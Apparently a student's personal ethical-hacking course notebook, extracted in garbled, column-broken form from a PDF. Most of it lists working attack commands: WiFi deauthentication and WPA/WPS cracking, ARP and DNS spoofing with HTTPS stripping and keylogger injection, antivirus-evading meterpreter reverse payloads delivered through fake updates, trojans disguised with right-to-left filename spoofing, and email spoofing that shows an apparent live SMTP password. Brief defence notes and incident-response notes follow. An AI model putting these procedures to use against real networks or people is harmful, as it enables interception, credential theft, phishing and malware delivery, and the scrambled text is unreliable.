Action/Attacks

Check for network with WPS enabled

Divide screen horizontally
Divide screen vertically
For broadcasting command
For broadcasting off command
List all interfaces
List all wireless interfaces
Change wireless adapter to Monitor Mode
Put adapter down
put adapter up
change mac address for adapter
kill all processes running
Sniff for wireless 2.4G networks within range
Sniff for wireless 5G networks within range
Sniff for wireless 2.4G and 5G networks within range
Sniff devices connected within a discovered network
Deauthentication attack
Deauthentication attack for 5G network
Fake authentication attack
Break WPS code
Break WPS code
create a wordlist
create a wordlist
create a wordlist
Get handshake packets
Tokeep connected, associate and run deauth attack
run handshake against wordlist
Commands
wash --interface wlan0
Shhift + Ctrl + o
Shhift + Ctrl + e
alt + a
alt + o
ifconfig
iwconfig
iwconfig wlan0 mode monitor
ifconfig wlan0 down
ifconfig wlan0 up
ifconfig wlan0 hw ether 00:11:22:33:44:55
airmon-ng check kill
airodump-ng wlan0
airodump-ng --band a wlan0
airodump-ng --band abg wlan0
airodump-ng --bssid TargetMac --channel X --write filename wlan0
aireplay-ng --deauth 1000000 -a TARGETNETWORKMAC -c TARGETCLIENTMAC wlan0
aireplay-ng --deauth 1000000 -a TARGETNETWORKMAC -c TARGETCLIENTMAC -D wlan0
aireplay-ng --fakeauth 30 -a E8:2C:6D:8E:E6:32 -h 26:38:ED:22:17:57 wlan0
reaver --bssid TARGETMAC --channel X --interface wlan0 -vvv --no-associate
./reaver --bssid TARGETMAC --channel X --interface wlan0 -vvv --no-associate
crunch 6 6 abc1!2 -o alptest3.txt -t s@@@@!
crunch (min) (max) (characters) -0 test.txt
crunch (min) (max) (characters) -0 test.txt -t a@@@@d
airodump-ng --bssid TargetMac --channel X --write wpa_handshake wlan0
aireplay-ng --deauth 1000000 -a TARGETNETWORKMAC -c TARGETCLIENTMAC wlan0
aircrack-ng wpa-handshake-01.cap -w test.txt
Comments

or use GPU to crack pw

We use Netdiscover or Zenmap/Nmap

When you jail break an IOS device, it automatically creats an SSH server with default pw
as alpine

Action/Attacks
research with netdiscover for all ip's on a network
research with ZENMAP for all ip's on a network

MITM (Man in the middle) Attack with ARP Spoof

ARP Spoofing

Allow port forwarding to allow packets to flow

MITM (Man in the middle) Attack with Bettercap

Run bettercap
type "help" to see list of bettercap commands
type "help net.probe" to activate this net.probe module. Net.probe will probe for IP's on
the subnet
To activate net.probe
To de-activate net.probe
to see all clients on the network
To see all ARP.SPOOF buttons
If arp.spoof.fullduplex is set to true, both the target and the gateway will be attacked
If true, local connections among computers of the network will be spoofed, otherwise
only connections going to and coming from the external network
If set to true, targets arp cache won't be restored when spoofing is stopped
Comma separated list of IP addresses, MAC addresses or aliases to spoof, also supports
nmap style IP ranges.
Turn on ARP Spoofing
Comma separated list of IP addresses, MAC addresses or aliases to skip while spoofing
works in bettercap to capture network traffic (note: it doesn’t work on https)

To make attack easier and faster, we can create a script for the commands by creating a
Caplet, which is a text file containing the 5 commands listed above and execute these
commands in one shot with the "run bettercap" command. We will assume the text file's
name which contains the commands is "spoof.cap"
After MITM attack with bettercap arp spoof attack, we can strip HTTPS to HTTP using
command below. We can use the same attack for HSTS security because the caplet file
has been modified to replace target domains with our own. Eg: Facebook.com with
facebook.corn
Action/Attacks
strip HTTPS to HTTP

DNS Spoofing attacks (redirect online visitor to a different destination

Start the DNS spoofer in the background.

Injecting Javascript code into the webpage after MITM attack

Running MITM attack using a Bettercap Graphical Interface

Sniffing & Analyzing Data using Wireshark

Action/Attacks

Running MITM Attack by creating a Fake Access point (Honeypot)

Commands Comments
netdiscover -r IPADRESS
zenmap Opens zenmap app

arpspoof -i eth0 -t TARGETIP ROUTERIP Both commands will be run back-to-back simultaneously
arpspoof -i eth0 -t ROUTERIP TARGETIP
echo 1 > /proc/sys/net/ipv4/ip_forward

bettercap iface eth0

help

help net.probe
net.probe on step 1
net.probe off
net.show
help arp.spoof
set arp.spoof.fullduplex true step 2

arp.spoof.internal true
arp.spoof.skip_restore true

set arp.spoof.targets IPADDRESS step 3

arp.spoof on step 4
arp.spoof.whitelist IPADDRESS
net.sniff on step 5

This command didn’t work so instead I ran "bettercap

iface eth0" to activate bettercap and then I used the
bettercap iface eth0 -caplet spoof.cap command "include spoof.cap" to run the caplet
Commands Comments
hstshijack/hstshijack MITM attack is a pre-requisite for Https or HSTS stipping
MITM attack is a pre-requisite for DNS Spoofing
dns.spoof.address : IP address to map
the domains to. (default=<interface
address>) Step 2 (Note step 1 is the MITM attack)

dns.spoof.all : If true the module will

reply to every DNS request, otherwise it
will only reply to the one targeting the
local pc. (default=false) step3
set dns.spoof.domains dijiwolf.com step4
dns.spoof on step 5

Step 1 - We create javascript file that will contain code to

inject. We name the file alert.js

Step 2 - We modify the hstshijack.cap file to include the js

script file to be executed on line
(*:/usr/local/share/bettercap/caplets/hstshijack/payloads
/keylogger,js*:/root/alert.js
Step 3 - We go to Kali and run bettercap to initiate MITM
Step 4 - We run hstshijack

I need to Re-visit becoz my browser didn’t load the

required IP address for the graphical interface

Wireshark is a tool used by network admins to analyze

traffic flowing through a network.
First we need tto be MITM and then we run wireshark to
sniff packets
Commands Comments

We use the App that turns the wireless adapter into a Wifi
hubspot. Once an un-suspecting user connects to the
internet using our wifi, we automatically become MITM
and can sniff packets
Detection/Prevention
Detection/Prevention

Wireshark can be used to

detect ARP Poisoning attack

Detection/Prevention

Xarp - is a tool that can

detect ARP Spoofing.

A way to prevent ARP

Spoofing in a small network is
to manually configure the
ARP table to be all "Static"
A way to prevent https
stripping is to install browser
Apps like "HTTPS Everywhere
for Firefox" It works only
withh HTTPS websites and
DNS spoofing is still possible

A way to prevent data access

even though a MITM attack
may suceed is to use a VPN -
All data is encrypted when
using a VPN (When using a
VPN, the VPN provider
automatically becomes MITM
so to mitigate this, be sure to
use an App like HTTPS
Everywhere with your VPN)
 Gaining Access to computers (Ser

Gaining access using Metasploitable for linux

Action/Attacks Commands
To connect to /Attack Metasploitable Linux
server VM Install rsh client using "apt-get install rsh-client"
usage: rlogin [-8ELKd] [-e char] [-i user] [-l user] [-p port] host

root@kali:~# rlogin -l root 192.168.245.130

id
pwd
ls
uname -a

To connect to server using Metasploit, we

open msf console msfconsole
for help help

show (something)
use (something)
set (options) (value)
exploit

Find Vulnerability using Nexpose

Access to computers (Server-side Exploits)
I installed Metasploitable for Linu
machine which will act as a serve

Comments Detection/Prevention

First thing to do before running a

is to grab as much info as possible
To login to the server, I used: to attack - If we know the servers
# rlogin -l root 192.168.245.130 use Zenmap to get info on the ser
To get id after connection entry route to exploit (misconfigu
to confirm location after my connection pw's, etc) - Further work is then d
list stuff exploit any opportunity seen. Eg:
open exec netkit-rsh rexecd
to show server details installed the App "rsh client" whic
connection with this open port

runs the metasploit console step 1

shows help
"something" can be exploits, payloads,
auxiliaries, options step 2 (show options)
use a certain exploit, payload, or auxilliary
configure option to ave a value of value step 3 (set options) Set rhost
runs the current task step 4

Nexpose is an enterprise level software for

finding vulnerabililies in "server side" attacks Steps taken in server side attacks
Step 1 (discover open ports and
running services
Step 2 (Find vulnerabilities) Use
google or exploit db I will not be installing this on my V
requirement. Basically this is an e
Step 3 (Find Exploits) is used to scan for vulnerabilities.
Step 4 (Exploit / Verify) vulnerabilities than Metasploit
Step 5 (Report)

5 Step's above are standard steps

used in CTF's (Capture The Flag)
like Hack Me and Hack The Box
 Metasploitable for Linux as a virtual
which will act as a server

g to do before running a server side attack

as much info as possible about the target
- If we know the servers ip address, we can
ap to get info on the server for possible
te to exploit (misconfigurations or default
- Further work is then done on how to
ny opportunity seen. Eg: we found (512/tcp
ec netkit-rsh rexecd) and then we
the App "rsh client" which will enable
on with this open port

be installing this on my VM coz of space

ent. Basically this is an enterprise tool that
scan for vulnerabilities. It exposes more
lities than Metasploit
Veil installed (used to gain access clientside and inject evil code using a payload)
LETS RUN A REVERSE ATTACK(getting the target to connect to our machine)
Action/Attacks

To launch reverse attack - an istance where the target connects

back to us ( go/meterpreter/rev_https.py )

NEXT WE LISTEN FOR THE IN-COMING CONNECTION USING

one of the modules in METASPLOIT
Action/Attacks
Run Metasploit
run the module to listen for incoming connections

While waiting for an incoming connection, now we look for a

way to deliver the payload. We will try a MITM attack for this
using ARP Spoofing
Action/Attacks
After Installing Evilgrade
run evilgrade

We are now going to use DAP (download accelerator Plus)

We want to change the agent

We then chage "send endsight"
Another method to deliver payload is "backdoor factory proxy"
We also need to run a man in the middle attack for this as well
Action/Attacks
ct evil code using a payload)
onnect to our machine)
Commands Comments Detection/Prevention

Open Veil (using Step 1 -

choose evasion step 2

Choose payload (go/meterpreter/rev_https.py) step 3
Change payload parameters like ip address and port
(set ipaddress to our machines ip address, set port to
8080 step 4

set processor to 1 step 5

set sleep to 6 step 6
Generate to generate the payload
Save the file with a name that allows you to know
which type of payload it is Step 7

Commands Comments Detection/Prevention

# msfconsole Step 1 -
# use exploit/multi/handler sttep 2

# show options step 3

# set payload /windows/meterpreter/reverse_https step 4

set LHOST 192.168.245.128 step 5
set LPORT 8080 step 6
# exploit step 7

Commands Comments Detection/Prevention

# cd /opt/evilgrade step 1
# ./evilgrade step 2
# show modules step 3
# configure DAP step 4
Show options step 5
set agent/var/www/html/backdoor.exe step 6
set endsight www.speedbit.com step 7
start step 8
Commands Comments Detection/Prevention

To prevent u can use a

file called "windmd5.com
and also you don’t allow
MITH and ensure all
downloads are in https
Below is a payload sample
go/meterpreter/rev_https.py
The whole Payload is didvided into 3 parts

1. Programming language 2.Type of "payload" 3. Method used to establish connection

Aim of modifying step 4,5,6 is to make the payload unique such that it wouldn’t be
recognized by antiviruses

ensure that the "payload option" name is same as the payload in the backdoor to be
delivered. If different, go to step 4

Once the payload in the exploit and that in the backdoor matches, then ensure you set
the parameters like LHOST and LPORT match the spec in the backdoor (see next steps)

We hope to deliver the payload by disguising a "fake App update". Evilgrade is an App
we will be using for this purpose - Evilgrade will serve as a server that aids App updates
In this method we deliver the payload when the target downloads an executable file.
Payload and file needed by the tartget are downloaded together

To do this , we run BDFProxy module and then execute a spoofing attack on the destination in which the target machine conne
ch the target machine connects back to
Maltego is a versatile tool for gathering information used in social enginnering

Using " autoit-download-and-execute.txt", we can also backdoor other files types like images (jpg), pdf's, mp3's, etc by injecti
from the web(file must be jpg or png and must not be html), followed by the backdoor evil file stored on our machine eg: http

To compile and change the Trojan's icon to that of the image or file types icon we use a modified version of " autoit-download
Backdoor and also select an icon for the file from www.iconarchive.com. You may also change an image to an icon using any a
Detection/Prevention To detect, manually inspect file extension or put file in a sandbox. You ca

If the backdoor file doesn’t end with the corresponding suffix to completely disquise the file (eg: sugar.exe is inappropriate for
character overide" between r & g. If browser security prevents the filename from using the character overide, compress the fi

email Spoofing (send emails as impersonating any email account)

Action/Attacks Commands
Send email as someone else using Kali sendemail

sendemail -xu [email protected] -xp

A2yc3Q7BvqO6ILPa -s smtp-relay.sendinblue.com:587
-f [email protected] -t
[email protected] -u "Stay Healthy" -m stay healthy
all year round in 2023. Check out this supplement i
used -o message-header="From: Tony
Cadoso<[email protected]>"

this is done by uploading a script that was renamed in

dot php and uploading the script to a website through
file manager in the websites osting account (The script
Send email as someone else using a website I uploaded was provided in the lecture (send.php)
Gaining access using BeEF (Browser Exploitation
Framework)
Action/Attacks Commands
Gaining access using BeEF (Browser Exploitation
Framework)
open the "start BeEF" App

Copy the hook script and place in an html page

(Don’t forget to change the hook script ip address as
require, depending on the attack)
Run or start the webserver service apache2 start
Connect to the html page with your windows
machine by opening the url
Look at Beef App for indication that BeEF is
connected to windows machine and verify that
Run any command from BeEF while still connected

Another way is to inject the BeEF hook script into HSTSHIJACK Caplet and run a spoofing attack to bypass Https, such that the

When generating a backdoor that would work outside of the local network we need to specify the external or public IP of the
g), pdf's, mp3's, etc by injecting our backdoor file into them such that when they are being downloaded, the backdoor script of file runs si
ored on our machine eg: http://192.168.245.128/Evil-Files/revhttps_8080.exe

version of " autoit-download-and-execute.txt" by renaming it to " autoit-download-and-execute.au3". Then we open the Autoit Compile A
image to an icon using any app online to convert image to icon. Once you ave the backdoor file completed, you can then hope to have it d
r put file in a sandbox. You can also use "https://hybrid-analysis.com" to check the file

sugar.exe is inappropriate for a supposed image file), we can spoof the file to manipulate its name as follows: Rename file to sugarexe.jpg
cter overide, compress the file into a ZIP file

Comments Detection/Prevention
step 1

step 2 **Remember the addition of the "-o message-header" lets the email show a nam

Common:
-t ADDRESS [ADDR ...] to email address(es)
-u SUBJECT message subject
-m MESSAGE message body
-s SERVER[:PORT] smtp mail relay, default is localhost:25
-S [SENDMAIL_PATH] use local sendmail utility (default: /usr/bin/sendmai

Optional:
-a FILE [FILE ...] file attachment(s)
-cc ADDRESS [ADDR ...] cc email address(es)
-bcc ADDRESS [ADDR ...] bcc email address(es)
-xu USERNAME username for SMTP authentication
-xp PASSWORD password for SMTP authentication
 Paranormal:
-b BINDADDR[:PORT] local host bind address
-l LOGFILE log to the specified file
-v verbosity, use multiple times for greater effect
-q be quiet (i.e. no STDOUT output)
-o NAME=VALUE advanced options, for details try: --help misc
-o message-content-type=<auto|text|html>
-o message-file=FILE -o message-format=raw
-o message-header=HEADER -o message-charset=CHARSET
-o reply-to=ADDRESS -o timeout=SECONDS
-o username=USERNAME -o password=PASSWORD
-o tls=<auto|yes|no> -o fqdn=FQDN

Comments Detection/Prevention

step 1 (Beef control

panel opens up with
this step))

step 2
step 3

step 4

step5
step 6

o bypass Https, such that the target injects the code on any site they visit.

e external or public IP of the router instead

ackdoor script of file runs simultaneously in the background. To do this we copy and paste the image url

e open the Autoit Compile App and fill the form with the required location info for Autoit File
u can then hope to have it downloaded using metasploit or MITM attack

Rename file to sugarexe.jpg by renaming the file as "sugargpj.exe and placing a "right-to-left

er" lets the email show a name

ocalhost:25
(default: /usr/bin/sendmail) instead of network MTA
eater effect

ails try: --help misc

set=CHARSET
After penetrating a system, one very good tool to use is Metaspoit / Meterpreter (Explore the use further with tutorials

Meterpreter is also a good tool with lots of post connection commands to play with for "post exploitation"
Its advisable to use "migrate" command in meterpreter to move onto explorer so that we can keep connected
Remember that port 80 or 8080 is usually used for connection by most servers

*Re-study Metasploit and Meterpreter*

use further with tutorials

exploitation"
keep connected
How Type
https://hybrid-analysis.com Manual
Configure Router 4 reverse engineering with IP Forwarding

To configure the router for a reverse attack from outside the local network, we need to specify the IP address of the router in
router to send the incoming traffic to our Kali machine. We configure the router by opening its dashboard and filling out neces
any requests it gets on a specified port to our kali machine
y the IP address of the router in the command and then configure the
dashboard and filling out necessary parameters instructing it to forward
Term/ Abbrev. Meaning / Explanation

Address Resolution Protocol (ARP) is a procedure for mapping a dynamic IP

address to a permanent physical machine address in a local area network (LAN).
The physical machine address is also known as a media access control (MAC)
address. https://www.techtarget.com/searchnetworking/definition/Address-
ARP Resolution-Protocol-ARP
Referance

Address-Resolution-Protocol-ARP
First we need to know the App the website was built with so that we know what the programming language for the website is
(eg: PHP, Python, or Javascript) PHP and Python are serverside language while Javascript is Clientside language)

There are tools used to gather some of these informattion required to launch a website attack, some are "whois lookup", "Net
We can also hack a website with good security through other sites on the same server or through its subdomains. To find othe
server, we ping its ip addreess and search it on Bing. To find a sites sub domain, we use the tool "Knockpy" in Kali

We can find files within a website by running thhe tool "dirb" eg: dirb https://dijibay.com

We can also use weevely, which is a tool used to create a php backdoor to exploit a website (Eg of command: weevely genera
/root/shell.php). We can then upload this PHP backdoor to a website to gain access

To exploit code execution vulneralbilities we need to create the commands in the backdoor with the same language as the op
Local file inclusion: We exploit any opportunitty a website has to allow uploading of files and we can use Netcat to listen in on
Remote File Inclusion: If the server is configured to allow a certain function called "allow_url and allow_url_fopen" , we will be

Website Hacking Mitigation

1: Never allow file uploads of any type
2: Avoid functions on the server that allows users to run operating system code. Or use regex to set rules
3: disable the function: "allow_url and allow_url_fopen"
4: Use static file inclusion instead of dynamic
ming language for the website is
entside language)

, some are "whois lookup", "Netcraft Site Report", "Robtex DNS Lookup"
ugh its subdomains. To find other sites on the same
ol "Knockpy" in Kali

g of command: weevely generate abdr579

th the same language as the operating system for the server and upload to a writeable file
we can use Netcat to listen in on a reverse connection *I need to explore netcat furthher*
nd allow_url_fopen" , we will be able to include any file from anywhere
If SQL injection is found, this can be very dangerous as it gives quick access to the website database. To find SQL injection vuln
with the login form using different logic codes
As regards injecting code into a browser, there is a high probability this may work if we notice that the browser url of the web
SQL Map is a linux tool to used for this type of attack (I will explore using thhis ttool more*
abase. To find SQL injection vulnerability, we can play around

that the browser url of the website has a dot php equals something (fgh.com/index.php=34)
A tool to use in exploring website vulnerabilities is OWASP ZAP ( I need to play more with this tool)
 Python Programing
I installed Pycharm for Python programming. To open Pycharm, we navigate to the downloaded applicatio
community-2022.2.3/bin) next we open the pycharm.sh application in the “Terminal” and run this coman
community-2022.2.3/bin# ./pycharm.sh

#!/usr/bin/env python

Modules Function
Subprocess Call

Page 40
 Python Programing
or Python programming. To open Pycharm, we navigate to the downloaded application in (Downloads/opt/pycharm-
/bin) next we open the pycharm.sh application in the “Terminal” and run this comand ~/Downloads/opt/pycharm-
/bin# ./pycharm.sh

Command
#!/usr/bin/env python 1
import subprocess 2
subprocess.call("ifconfig", shell=True) 3

#!/usr/bin/env python 1
2
import subprocess 3
4
interface = "wlan0" 5
new_mac = "00:11:22:44:77:98" 6
7
print("[+] Changing Mac address for " + interface + "to new_mac") 8
9
subprocess.call("ifconfig", shell=True) 10
subprocess.call("ifconfig " + interface + " down", shell=True) 11
subprocess.call("ifconfig " + interface + " hw ether " + new_mac, shell=True 12
subprocess.call("ifconfig " + interface + " up", shell=True) 13
14

Page 41
 Python Programing
application in (Downloads/opt/pycharm-
is comand ~/Downloads/opt/pycharm-

Changing Mac Address

Page 42
 Incident Response

Incident response is the action or a set of steps or proc

What is incident response? steps will cover all phases of an incident response plan

An incident response plan is an action plan taken to co

What is an incident response plan? restore operations.

An incident response process is a c

identifying, investigating and resp
What is an incident response process? incident response process is the en
incident investigation, while incid
tactics

Incident Response Tools Log Analysis; SIEM Alerts; IDS Alert

Vulnerability Analysis; Application

Incident Response Team 1. Team Leader 2. Lead Investigator 3.

Communications Lead 4. Documentatio
Timeline Lead 5. HR/Legal representat

1. Preparation 2. Identification 3.
Containment 4. Eradication 5. Recovery
Key Phases of an Incident Response Plan 6. Lessons learned

1. External/removable media 2.
Attack Strategies
Attrition 3. Web 4. Email 5.
Improper Usage 6. Loss of the
equipment 6. Other

1. Reconaissance and Probing 2. Delivery and

Cyber Kill Chain (This is the likely path an attacker will follow in 3. Exploitation and Installation 4. System
executing an attack) Compromise
Page 43
 Incident Response 1. Reconaissance and Probing 2. Delivery and
Cyber Kill Chain (This is the likely path an attacker will follow in 3. Exploitation and Installation 4. System
executing an attack) Compromise

1. Port-Scanning activity (pre-incident) – prio

- LOW-MEDIUM 3. DoS & DDoS – HIGH 4. Una
Insider Breach – HIGH 6. Unauthorized pr
Destructive attack (systems, data) – HIGH 8.
(APT) – HIGH 9. False alarms - LO
Security Incident types and Kill Chain phase

Top 5 open source IR tools: (lin

Incident response tools 1.) CimSweep 2.) GRR Rapid R
4.) Osquery 5.) MIG

1) Define what an incident is within the organization, w

consideration the compliance and regulation requirem
will differ from organization to organization. 2) Determ
or an entire business unit or company) and consider ha
Steps in creating IR Plan that will be referenced by all other plans. 3) Identify an
Incident response contacts, technical contacts, busines
impacting group) Stakeholders must know what is expe
Determine your incident response process. 5) Determin
consideration to the itemized points below. 6) Determi
method. 7) Define your “playbooks”

Page 44
Incident Response

FFIEC (federal financial institutions examination

council) for Compliance in the banking industry
focusses on malware attacks
PCL Programmable Crime Logic is the technology
used by most malware for Man In The Browser
Attacks. Attacks are executed from the users
computer

Page 45
 Incident Response

e action or a set of steps or procedure followed when there is a threat or security breach. These
ses of an incident response plan

lan is an action plan taken to counter and a security breach or threat to mitigate loss of assets and

sponse process is a collection of procedures aimed at

vestigating and responding to potential security incidents. An
nse process is the entire lifecycle (and feedback loop) of an
tigation, while incident response procedures are the specific

SIEM Alerts; IDS Alerts; Traffic Analysis; Netflow Tools;

Analysis; Application Performance Monitoring

2. Lead Investigator 3.
Lead 4. Documentation &
. HR/Legal representation

2. Identification 3.
adication 5. Recovery
ons learned

ovable media 2.
b 4. Email 5.
6. Loss of the
ther

nd Probing 2. Delivery and Attack

Installation 4. System

Page 46
nd Probing 2. Delivery and Attack Incident Response
Installation 4. System

ctivity (pre-incident) – priority LOW 2. Malware Infection

. DoS & DDoS – HIGH 4. Unauthorized access – MEDIUM 5.
– HIGH 6. Unauthorized privilege escalation - HIGH 7.
k (systems, data) – HIGH 8. Advanced Persistance Threat
– HIGH 9. False alarms - LOW 10. Other – HIGH

ource IR tools: (links in the Resources)

p 2.) GRR Rapid Response 3.) TheHive
5.) MIG

dent is within the organization, while simultaneously taking into

pliance and regulation requirements the organization is under. This
ation to organization. 2) Determine the scope (whether just a system
nit or company) and consider having a central incident response plan
by all other plans. 3) Identify and train your Stakeholders (Eg:
acts, technical contacts, business leadership contacts, customer
eholders must know what is expected of them in an incident 4.)
nt response process. 5) Determine your Threat Severity Level with
emized points below. 6) Determine the communication plan and
r “playbooks”

Page 47
 Incident Response

l institutions examination
e in the banking industry
attacks
me Logic is the technology
for Man In The Browser
ecuted from the users

Page 48
 Incident Response

SIEM delivers next-generation cybersecurity functionality for businesses in real-time. It covers the
key challenges of modern cybersecurity: from threat intelligence to managing events and incident
response. It brings together two disciplines—security information management and event
management (SEM) and offers real-time analysis of security operations across your IT
infrastructure.

Page 49
Incident Response

Page 50
Incident Response

Page 51